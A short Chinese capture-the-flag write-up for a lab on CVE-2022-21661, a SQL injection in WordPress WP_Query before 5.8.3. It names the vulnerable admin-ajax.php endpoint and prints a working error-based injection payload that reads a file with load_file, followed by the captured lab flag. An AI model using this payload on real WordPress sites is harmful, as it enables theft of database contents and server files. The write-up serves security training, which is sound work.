春秋云镜 CVE-2022-21661 wordpress < 5.8.3 存在sql注入漏洞
靶标介绍
2022年1月6日,wordpress发布了5.8.3版本,修复了一处核心代码WP_Query的sql注入漏洞。WP_Query是wordpress定义的一个类,允许开发者编写自定义查询和使用不同的参数展示文章,并可以直接查询wordpress数据库,在核心框架和插件以及主题中广泛使用。源码位置:www.tar。
下载源码http://eci-2zejfdjulpocrlx7ojkm.cloudeci1.ichunqiu.com/www.tar
漏洞存在路径为/wp-admin/admin-ajax.php
判断有无方法
Post提交action=函数名,当调用方法正确即调用的WP_Query的构造方法的action无回显,当调用方法不对或者不存在返回0。
读取前35个字符
读取后续字符
获取flag:
flag{df5a3e62-4f2c-4185-938b-a35acee485e4}
POST参数
action=test&data={“tax_query”:{“0”:{“field”:“term_taxonomy_id”,“terms”:[“111) and extractvalue(rand(),concat(0x5e,(substring((select load_file(‘/flag’)),30,35)),0x5e))#”]}}}
师傅,你都点关注了,就别点取消了